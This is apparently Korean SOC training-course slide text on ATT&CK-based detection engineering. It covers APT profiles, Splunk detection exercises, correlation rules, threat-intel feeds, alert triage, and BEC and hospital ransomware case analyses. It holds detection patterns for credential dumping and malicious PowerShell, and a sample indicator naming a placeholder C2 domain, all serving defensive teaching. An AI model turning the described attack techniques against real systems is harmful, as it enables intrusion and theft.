경영진 보고ATT&CK 기반 지표Coverage 히트맵

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
경영진 보고·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

APT 그룹 프로파일: Lazarus Group (G0032)

CTI 보고서 TTP → ATT&CK 매핑 → 탐지 우선순위 연결의 실전 예시

APT 프로파일

Lazarus Group 기본 정보

귀속: 북한 정부 연계 (Lazarus, Hidden Cobra, ZINC)
활동 시작: 2009년 이후 지속 활동
주요 타겟: 금융기관, 암호화폐 거래소, 방산업체, 정부기관
주요 목적: 금전적 이익, 사이버 스파이, 사보타주
대표 사건: Sony Pictures(2014), SWIFT 해킹(2016), WannaCry(2017)

주요 TTP (ATT&CK 매핑)

T1566 Spearphishing — 타겟팅된 피싱 이메일
T1059.001 PowerShell — 악성 스크립트 실행
T1027 Obfuscation — 다중 인코딩 난독화
T1055 Process Injection — LSASS 포함 다수 기법
T1071 C2 HTTPS/DNS — 다양한 C2 채널 활용
T1486 Ransomware — WannaCry, VHD Ransomware

탐지 우선순위 (Lazarus TTP 기준)

Technique	현재 Coverage	우선순위
T1566 Phishing	3 (검증)	유지
T1059.001 PowerShell	3 (검증)	유지
T1055 Process Injection	2 (미검증)	Purple Team 필요
T1027 Obfuscation	1 (룰 없음)	즉시 룰 작성
T1071 C2	2 (부분)	DNS 탐지 추가
T1486 Ransomware	3 (검증)	유지

📍 참고: attack.mitre.org/groups/G0032/ → Techniques Used 탭에서 Lazarus의 전체 TTP 목록과 각 Technique별 Procedure 사례 확인 가능

보강 설명 Lazarus Group은 북한 연계 APT로 금융·암호화폐·방산 분야를 주요 타겟으로 합니다. ATT&CK 사이트의 그룹 페이지를 직접 보는 방법을 안내하며 TTP를 탐지… 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

Lazarus GroupG0032APT 프로파일

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Lazarus Group·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

APT 그룹 프로파일: APT29 / Cozy Bear (G0016)

러시아 SVR 연계 — 정교한 OPSEC과 공급망 공격으로 장기간 잠복하는 최고 수준의 위협

APT 프로파일

APT29 기본 정보

귀속: 러시아 대외정보국(SVR) 연계
특징: 극도로 정교한 OPSEC, 장기 잠복(수개월~년), 탐지 회피 최우선
주요 타겟: 정부기관, 외교부, 방산업체, 연구기관, 제약회사
대표 사건: SolarWinds(2020), Microsoft 이메일 침해(2024), DNC 해킹

주요 TTP

T1195 Supply Chain Compromise — SolarWinds 유형
T1078.004 Cloud Accounts — M365·Entra ID 침해
T1102 Web Services C2 — Google Drive·Dropbox C2
T1550.001 Application Access Token — OAuth 토큰 탈취
T1213.002 SharePoint·OneDrive 데이터 수집
T1562 Defense Evasion — 다수 우회 기법 병행

APT29 탐지의 특수 과제

극도로 느린 활동: 하루 수 건의 API 호출로 탐지 임계값 우회
정상 클라우드 서비스 활용: Google Drive C2 — 기업 방화벽 거의 허용
합법적 토큰 사용: OAuth2 토큰 — 비밀번호 탈취 없이 M365 접근
Sunspot 빌드 인젝션: 빌드 서버 자체 침해로 소프트웨어에 삽입

🚨 현실적 탐지 접근: APT29 수준 위협은 단순 룰로 탐지 불가. CTI 기반 IOC 구독 + Anomaly Detection + Microsoft 365 감사 로그 활성화 + OAuth 동의 정책 강화 필요

보강 설명 APT29는 러시아 SVR 연계 APT로 매우 정교한 TTP를 사용합니다. SolarWinds 공급망 공격, Microsoft 365 침해 등이 대표적입니다. OPSEC을 매우 중시해 탐지가 어렵습니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

APT29Cozy BearG0016

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
APT29·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

Splunk SPL 탐지 쿼리 집중 훈련 5선

ATT&CK Technique별 탐지 쿼리를 직접 작성하면서 탐지 엔지니어링 실력을 키운다

SPL 실전 훈련

# Q1. T1110.003 Password Spraying # 힌트: 5분 내 동일 IP → 10개 이상 계정 실패 index=winevent EventCode=4625 | ??? ... # Q2. T1071.004 DNS Beaconing # 힌트: 1시간 내 동일 도메인 120회 이상 쿼리 index=dns | ??? ... # Q3. T1078 Impossible Travel # 힌트: 동일 계정, 1시간 내, 다른 국가 로그인 index=vpn_auth status=success | ??? ... # Q4. T1003.001 LSASS Access # 힌트: Sysmon 10, Target=lsass.exe, 비시스템 프로세스 index=sysmon EventCode=10 | ??? ... # Q5. T1567.002 Exfiltration to Cloud # 힌트: 업무외 시간, 100MB 이상, 비승인 SaaS index=proxy method=POST | ??? ...

# 모범 답안 Q1 index=winevent EventCode=4625 | bucket _time span=5m | stats dc(TargetUserName) as accts count as fails by _time, IpAddress | where accts > 10 AND fails < accts*3 # 모범 답안 Q4 index=sysmon EventCode=10 TargetImage="*\\lsass.exe" NOT SourceImage IN ("*\\System32\\*", "*\\SysWOW64\\*", "*\\CrowdStrike\\*") # EDR 제외 | table _time, SourceImage, GrantedAccess

⏱️ Q2, Q3, Q5 모범 답안은 강사가 수업 후 공개 — 먼저 직접 작성해 보세요

보강 설명 Splunk SPL 쿼리 작성 집중 훈련입니다. 5개의 탐지 시나리오에 대해 SPL 쿼리를 직접 작성하면서 탐지 엔지니어링 실력을 키웁니다. 시간 순서와 후속 조치를 같이 보면 공격 흐름이 더 또렷해집니다.

Splunk SPL탐지 쿼리stats

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

탐지 엔지니어링 심화: 상관 규칙(Correlation Rule) 설계

단일 이벤트 탐지를 넘어 공격 체인을 한 번에 잡는 상관 규칙 설계 패턴

탐지 엔지니어링 심화

상관 규칙 설계 패턴

시간 윈도우 패턴: 10분 내 A 이벤트 → B 이벤트 → C 이벤트 순서
동일 엔터티 연결: 같은 IP/사용자/호스트에서 발생한 연속 이벤트
임계값 조합: A 조건 AND (B 횟수 > 5) AND (C 시간 < 새벽)
부재 조건: A가 발생했는데 정상 B가 없으면 경보

# Splunk 상관 규칙: 피싱 체인 탐지 # Office 프로세스 → PS 실행 → 외부 연결 index=sysmon EventCode=1 ParentImage IN ("*\\EXCEL.EXE","*\\WINWORD.EXE") Image="*\\powershell.exe" | join type=inner ComputerName [ search index=sysmon EventCode=3 NOT DestinationIp IN ("10.*","172.*","192.168.*") | where _time > relative_time(now(), "-5m")] # Office→PS 실행 후 5분 내 외부 연결 = 매우 높은 신뢰도

상관 규칙의 장점

정탐률 상승: 여러 조건을 동시 충족해야 발화 → 오탐 대폭 감소
공격 체인 가시화: 단계별 흐름이 한 경보에 담김
대응 속도 향상: 단일 경보로 전체 상황 파악 가능
ATT&CK 매핑 용이: 체인 단위로 Tactic 전환을 표현

⚠️ 주의점: 상관 규칙은 각 단계 로그가 SIEM에 수집되어야만 동작. 로그 하나라도 빠지면 발화 불가. Coverage 분석으로 선행 확인 필수

보강 설명 단일 이벤트 탐지를 넘어 여러 이벤트를 시간 순서로 묶어 상관 규칙을 설계하는 방법입니다. 공격 체인을 한 번에 탐지하는 상관 규칙은 정탐률이 훨씬 높습니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

상관 규칙Correlation Rule공격 체인 탐지

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

위협 인텔리전스 연동 심화: MISP · STIX · TAXII

IOC를 SIEM에 자동 반영하고 ATT&CK TTP와 연결하는 TI 자동화 파이프라인

TI 연동

TI 표준 체계

STIX 2.1: 위협 인텔리전스 공유 표준 형식. IOC, TTP, Campaign, Actor 등을 JSON으로 표현
TAXII 2.1: STIX 데이터를 HTTP/S로 전송하는 프로토콜. Pull/Push 모드 지원
MISP: 오픈소스 위협 인텔리전스 플랫폼. IOC 공유·관리·자동화 지원
ATT&CK 연동: STIX 형식으로 ATT&CK 전체 매트릭스 배포됨 → MISP·SIEM 연동

자동화 파이프라인

TI 피드(AlienVault OTX, VirusTotal, 자체 CTI) → TAXII Pull
MISP에서 IOC 정규화 및 품질 평가
SIEM 자동 업데이트 (차단 목록, 탐지 규칙)
ATT&CK Technique 태그 자동 부착
히트 시 자동 경보 및 SOAR 플레이북 트리거

# STIX 2.1 Indicator 예시 (단순화) { "type": "indicator", "id": "indicator--abc123...", "name": "Lazarus C2 Domain", "pattern": "[domain-name:value = 'evil-c2.xyz']", "kill_chain_phases": [{ "kill_chain_name": "mitre-attack", "phase_name": "command-and-control" }], "x_mitre_technique_id": "T1071.001" }

✅ 무료 TI 피드:
AlienVault OTX (otx.alienvault.com)
abuse.ch (feodotracker, SSL blacklist)
MISP Threat Sharing (circl.lu)
CISA Known Exploited Vulnerabilities

보강 설명 위협 인텔리전스를 자동으로 SIEM에 연동하는 방법을 다룹니다. MISP, STIX/TAXII 표준을 이용해 IOC를 자동으로 탐지 체계에 반영할 수 있습니다. 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

MISPSTIX TAXIIIOC 자동화

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
MISP·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

ATT&CK Coverage 기반 보안 아키텍처 설계

어떤 솔루션이 어떤 Technique를 커버하는지 매핑해 탐지 레이어를 설계한다

보안 아키텍처

보안 솔루션	커버하는 Tactic/Technique	ATT&CK 관점 Coverage
메일 보안 (SEG)	Initial Access (T1566 전체), Credential Access (피싱 링크)	Initial Access 핵심 커버
EDR	Execution, Persistence, Defense Evasion, Credential Access (엔드포인트)	가장 넓은 범위 커버
SIEM	모든 Tactic (상관 규칙 기반), 특히 횡적 이동·인증	상관 분석 핵심
NDR (네트워크 탐지)	C2, Exfiltration, Lateral Movement (네트워크 레벨)	엔드포인트 사각지대 보완
CASB	Collection (SaaS), Exfiltration (클라우드), Valid Accounts (SaaS)	클라우드 확장 시 필수
WAF	Initial Access (T1190 웹 익스플로잇), T1505 WebShell 일부	웹 레이어 전문
DLP	Collection, Exfiltration (데이터 레벨)	데이터 기반 탐지
PAM/IAM	Credential Access, Privilege Escalation, Lateral Movement	접근 제어 레이어

✅ 최소 탐지 스택 (엔터프라이즈 기준):
메일 보안 + EDR + SIEM + 네트워크 로그(NetFlow/DNS) = 대부분의 Enterprise ATT&CK Technique 기본 탐지 가능

⚠️ 클라우드 채택 시 추가 필요:
CASB + Cloud Native 로그(CloudTrail, Azure AD 감사) + CSPM = 클라우드 Coverage 확보

보강 설명 ATT&CK Coverage를 높이기 위해 어떤 보안 아키텍처가 필요한지 설명합니다. 탐지 레이어별로 어떤 솔루션이 어떤 Technique를 커버하는지 매핑합니다. 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

보안 아키텍처탐지 레이어EDR SIEM CASB

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
보안 아키텍처·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

SOC 당직 근무 시뮬레이션 — 경보 Triage 훈련

오늘 밤 당신이 당직 분석가입니다 — 다음 경보들을 우선순위 순으로 처리하시오

당직 시뮬레이션

동시 발생 경보 6건 (02:15 AM)

EDR: lsass.exe 메모리 접근 — DC-01 서버, unknown_svc.exe 소스

SIEM: 대량 파일 복사 — finance 서버, 사용자 kim.soyeon, 847건

SIEM: 로그인 실패 23회 — 외부 IP, 동일 계정 반복

Proxy: Beaconing 탐지 — 90초 주기, 신규 외부 도메인

메일GW: 스팸 경보 — 외부 대량 수신, 일반 광고성

WinEvent 1102: 보안 로그 삭제 — DC-01 서버, 02:13 발생

과제: 다음에 답하시오 (5분)

① 6개 경보를 즉각 대응 / 조사 필요 / 낮은 우선순위로 분류하시오
② 처리 순서를 1~6으로 정하고 이유를 설명하시오
③ A와 F 경보 간의 연관 관계를 ATT&CK으로 설명하시오
④ 즉각 취해야 할 첫 번째 행동은?

⚠️ 힌트: 경보를 개별적으로 보지 말고, 같은 서버(DC-01)에서 발생한 경보들을 먼저 연결해 보세요. 시간 순서도 중요합니다 (F가 A보다 2분 먼저 발생)

보강 설명SOC 당직 근무 중 발생하는 경보를 처리하는 시뮬레이션입니다. 수강생이 분석가 역할을 맡아 경보를 Triage하고 대응을 결정합니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

당직 시뮬레이션Triage우선순위 결정

설명 확장

당직 시뮬레이션 기준으로 첫 단서를 먼저 분류하기
Triage를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

당직 시뮬레이션 해설 — 모범 우선순위와 대응 논리

경보를 개별이 아닌 연관 관계로 보는 것이 시니어 분석가의 역량

당직 시뮬레이션 해설

경보	우선순위	분류	ATT&CK	이유
F	P1 — 1순위	즉각 대응	T1070.001	DC-01 보안 로그 삭제 = 증거 인멸 시도, 02:13 먼저 발생
A	P1 — 2순위	즉각 대응	T1003.001	DC-01 lsass.exe 접근 = F와 같은 서버, 자격증명 탈취 시도
D	P2 — 3순위	조사 필요	T1071.001	Beaconing = A·F 이후 C2 채널 가능성, 피해 확산 우려
B	P2 — 4순위	조사 필요	T1039	A·F와 연결 가능성. 단 kim.soyeon 업무 패턴 먼저 확인
C	P3 — 5순위	모니터링	T1110	외부 로그인 실패 — 진행 중이지만 성공 없으면 즉각 위협 낮음
E	P4 — 6순위	낮음	—	광고성 스팸 — 위협 지표 없음, 나중에 처리

🚨 즉각 첫 번째 행동:
DC-01을 네트워크에서 격리하기 전에 먼저 메모리 덤프와 로그 백업을 시도. 단, lsass.exe 접근이 진행 중이므로 EDR Tamper Protection 상태 즉시 확인

📝 30초 보고 (시니어에게):
"DC-01 서버에서 02:13 보안 로그 삭제(T1070.001) 후 02:15 lsass.exe 메모리 접근(T1003.001)이 감지되었습니다. 자격증명 탈취 후 C2 연결 가능성(D번 경보)이 우려됩니다. DC-01 격리와 Domain Admin 비밀번호 긴급 변경을 권고합니다."

보강 설명 당직 시뮬레이션 해설입니다. A와 F는 DC-01에서 연결된 사건으로 즉각 대응이 필요합니다. D는 피해 확산과 연관 가능성이 있어 높은 우선순위입니다. E는 낮은 우선순위입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

당직 해설우선순위 결정DC-01 연결

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
당직 해설를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

실전 케이스: BEC (기업 이메일 사기) ATT&CK 분석

CEO 사칭 이메일로 수억 원 송금 유도 — 금전 피해 1위 공격의 ATT&CK 체인

실전 케이스

T1566.002 — 피싱 링크로 크리덴셜 수집

CFO 메일 계정 비밀번호를 가짜 M365 로그인 페이지로 탈취

T1114.002 — 이메일 규칙으로 모니터링

CFO 받은 편지함에 전달 규칙 설정 → 공격자도 동시 수신

T1534 — 내부 스피어피싱

CFO 계정으로 재무팀에게 "긴급 이체" 요청 발송 (내부 신뢰 악용)

T1657 — 금전 탈취 (Financial Theft)

재무팀이 속아 수억 원을 공격자 계좌로 이체 → 즉각 회수 불가

BEC 탐지 포인트

이메일 전달 규칙: 외부로 자동 전달하는 규칙 신규 생성 탐지
비정상 로그인: CFO 계정 해외 IP 접근, 새 디바이스
이체 요청 패턴: 이메일로 긴급 이체 요청 (정책: 별도 확인 절차)
도메인 유사성: company.co.kr vs c0mpany.co.kr

⚠️ 예방이 최선:
① 임원 계정 MFA 강제 ② 이메일 외부 전달 정책 금지 ③ 이체 절차에 전화 재확인 단계 추가 ④ DMARC reject 정책 적용

보강 설명BEC는 기업 이메일 계정을 탈취하거나 사칭해 금융 사기를 벌이는 공격입니다. FBI 보고서에 따르면 사이버 공격 중 금전 피해 1위입니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬 선명해집니다.

T1566.002T1114.002BEC

시나리오 확장

T1566.002가 앞뒤 단계와 어떻게 이어지는지 정리
T1114.002를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

실전 케이스: 의료 기관 랜섬웨어 ATT&CK 분석

인터넷 노출 RDP → 내부 확산 → 의료 기록 암호화 — 환자 안전까지 위협하는 체인

실전 케이스

단계	Technique	구체적 행위	의료 맥락 위험
Initial Access	T1133 RDP	인터넷 노출 RDP 취약점 악용	의료 시스템 원격 접근
Execution	T1059 PS	PowerShell로 페이로드 다운로드	PACS 서버 접근 시작
Lateral Move	T1021 RDP/SMB	병동 PC → EMR 서버 이동	의료 기록 시스템 도달
Discovery	T1083 File	DICOM, HL7 파일 탐색	의료 영상·기록 식별
Inhibit Recovery	T1490	VSS 삭제, 백업 연결 해제	복구 불가 상황 조성
Impact	T1486	EMR, PACS, 처방 시스템 암호화	환자 진료 즉각 중단

의료 환경 특수 고려사항

의료 기기 OT: CT, MRI, 투석 기계는 패치 불가 → 격리 필수
24/7 운영: 중단 불가 시스템 → 격리 결정 매우 신중히
규제 준수: 개인의료정보(PHI) 유출 시 의료법 위반
인명 위협: 수술실·응급실 시스템 중단 시 환자 생명 위험

🚨 의료 기관 우선 대응:
① 환자 안전 최우선 (수동 절차 전환) ② 감염 시스템 격리 (단 의료 기기 제외) ③ CISA·복지부 신고 ④ 백업 복구 즉시 시도

보강 설명 의료 기관 랜섬웨어 공격은 환자 안전에 직결되므로 특히 위험합니다. RDP 취약점으로 시작해 의료 기록 암호화까지의 체인을 분석합니다. 의료 분야 SOC에서 특별히 주의해야 할 Technique를 다룹니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

의료 랜섬웨어RDP 공격의료 기록 암호화

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

SOAR 플레이북 심화: ATT&CK 기반 자동화 설계

무엇을 자동화하고 무엇을 사람이 판단할지 — Technique별 자동화 분기 설계 원칙

SOAR 심화

자동화 적합한 액션

✅ IP·도메인 평판 조회 (VirusTotal, TI 피드)
✅ 파일 해시 검색 (EDR 전체 배포 스캔)
✅ 티켓 생성 및 분류 (Jira/ServiceNow)
✅ 관련 로그 자동 수집 및 첨부
✅ 알려진 C2 IP 방화벽 차단
✅ 계정 로그인 임시 비활성화 (T1110 탐지 시)
✅ 에스컬레이션 알림 발송

인간 판단 필요 액션

⚠️ 호스트 네트워크 격리 (업무 영향 평가 필요)
⚠️ 계정 영구 비활성화 (임원·서비스 계정)
⚠️ 외부 통보 (고객, 규제기관, 언론)
⚠️ 법집행기관 신고 결정
⚠️ 데이터 유출 여부 최종 판단
⚠️ 비즈니스 연속성 계획 발동
⚠️ 복구 vs 포렌식 보존 우선순위 결정

💡 자동화 원칙: High Confidence + 낮은 업무 영향 = 자동 실행 가능 | Low Confidence + 높은 업무 영향 = 반드시 인간 승인 후 실행 | Confidence와 자산 중요도를 교차한 2×2 매트릭스로 자동화 범위 결정

보강 설명SOAR 플레이북을 ATT&CK 기반으로 설계하는 심화 내용입니다. Technique별로 다른 플레이북 경로를 설계하고, 자동화와 인간 판단을 구분하는 기준을 다룹니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아…

T1110SOAR 플레이북자동화 판단 기준

설계 포인트

T1110에 필요한 Data Source를 먼저 정리하기
SOAR 플레이북를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

탐지 공백 해소 로드맵 작성 실습

Coverage 분석 결과를 분기별 실행 계획으로 전환하는 실전 작성 훈련

로드맵 실습

분기	목표	대상 Technique	액션	담당
Q1 (현재~3월)	Score 0 → 1 전환	T1550.002, T1558.003	NetLogon·DC Kerberos 로그 수집 활성화	인프라팀
Q1 (현재~3월)	Score 1 → 2 전환	T1053.005, T1505.003	예약작업·웹쉘 탐지 룰 작성	탐지팀
Q2 (4~6월)	Score 2 → 3 전환	T1566, T1059.001	Atomic Red Team 검증 실행	Purple Team
Q2 (4~6월)	클라우드 Coverage	T1078.004, T1530	CloudTrail + IAM 이상 탐지 룰 추가	클라우드팀
Q3 (7~9월)	자동화 Coverage	T1110, T1190	SOAR 플레이북 연동 + 자동화 테스트	자동화팀
Q4 (10~12월)	성숙도 목표	전체 재평가	연간 Coverage 리뷰 + Purple Team 전체 점검	전팀

로드맵 작성 팁

한 분기에 너무 많은 목표 금물 — 3~5개가 현실적
담당자를 팀 단위가 아닌 개인 이름으로 지정
완료 기준(Done Definition)을 명확히 — "룰 작성" X, "운영 배포 후 오탐 검토 완료" O
월간 리뷰 미팅에서 진행 상황 체크
경영진 보고에 로드맵 진행률 포함

⏱️ 실습 과제 (10분):
본인 조직(또는 가상 환경) 기준으로 Q1 목표 3개를 위 표 형식으로 작성해 보세요. 파트너와 서로 검토하고 현실성 피드백을 주세요.

보강 설명 Coverage 분석 결과를 바탕으로 실제 로드맵을 작성하는 실습입니다. 분기별 목표를 설정하고, 담당자와 기한을 명시하는 것이 핵심입니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

탐지 로드맵분기별 목표Coverage 개선

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
탐지 로드맵를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

침해지표(IOC) 추출과 품질 평가 · 공유

좋은 IOC는 정확하고 맥락이 있다 — 추출·평가·공유까지의 실전 프로세스

IOC 실전

IOC 유형과 수명

IOC 유형	내용	유효 수명	우선순위
파일 해시 (MD5/SHA256)	악성 파일 고유 식별자	반영구	높음
도메인/URL	C2·피싱 도메인	수일~수주	중간
IP 주소	공격 인프라 IP	수시간~수일	낮음
User-Agent	공격 도구 식별자	중간	중간
레지스트리 키	Persistence 위치	반영구	높음
뮤텍스명	악성코드 인스턴스 ID	반영구	높음

TLP 분류 기반 공유 정책

TLP:RED 명명된 수신자만 공유 — 외부 유출 금지
TLP:AMBER 조직 내 Need-to-Know로 제한
TLP:GREEN 커뮤니티 내 공유 가능 (공개 포스팅 금지)
TLP:CLEAR 제한 없이 공유 가능 (공개 발표)

✅ IOC 공유 채널:
KISA 사이버위협정보 공유 시스템 (C-TAS)
MISP 인스턴스 (조직 간 자동 공유)
업종별 ISAC (금융, 의료, 에너지 등)

보강 설명사고 분석 후 IOC를 추출하고 팀·기관 간에 공유하는 방법입니다. IOC의 유형, 품질 평가, 유효 기간 관리를 다룹니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

IOC 추출IP 해시 도메인IOC 품질

설명 확장

IOC 추출 기준으로 첫 단서를 먼저 분류하기
IP 해시 도메인를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

포렌식과 ATT&CK: 사고 시 디지털 증거 수집 가이드

휘발성 높은 것부터 — 올바른 수집 순서가 ATT&CK 재구성 품질을 결정한다

포렌식 실전

증거 수집 순서 (휘발성 높은 것 우선)

메모리 덤프 (RAM) — 프로세스, 네트워크 연결, 암호화 키, Mimikatz 흔적. 도구: WinPmem, Avast Mem

네트워크 연결 상태 — netstat -anb, 현재 연결 IP/포트, C2 실시간 확인

실행 중인 프로세스 목록 — tasklist /v, 비정상 프로세스 식별

이벤트 로그 백업 — Security, System, PowerShell 로그 내보내기 (.evtx)

디스크 이미지 (전체 또는 증거 파티션) — dd, FTK Imager로 비트 단위 복사

Chain of Custody (증거 보관 연속성)

수집 일시, 수집자, 수집 방법 문서화
해시값(SHA256) 계산 → 무결성 보장
접근 로그 유지 — 누가 언제 열람했는지
원본은 읽기 전용 보관, 분석은 사본으로

💡 ATT&CK 재구성을 위한 핵심 증거:
T1059 → PowerShell 이벤트 로그(4104) + bash_history
T1003 → 메모리 덤프 (lsass 영역 분석)
T1071 → 네트워크 상태 + 패킷 캡처
T1547 → 레지스트리 하이브 (NTUSER.DAT)

보강 설명 사고 발생 시 디지털 포렌식 증거를 올바르게 수집하는 방법입니다. ATT&CK 매핑을 위한 증거 수집 순서와 각 Technique별 핵심 증거를 다룹니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

디지털 포렌식증거 수집 순서휘발성 증거

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

국내 보안 규제와 ATT&CK Coverage 연계

ISMS-P · 금융보안 규제 · 개인정보보호법 요구사항을 ATT&CK Coverage로 충족하는 접근

규제 연계

규제/인증	주요 보안 요구사항	연관 ATT&CK Coverage
ISMS-P	접근 통제, 로그 관리, 이상 행위 탐지, 사고 대응	Credential Access, Lateral Movement 탐지; 로그 수집 Coverage
전자금융감독규정	비정상 거래 탐지, 침해 사고 보고, 취약점 점검	T1110 Brute Force, T1078 Valid Accounts Coverage 필수
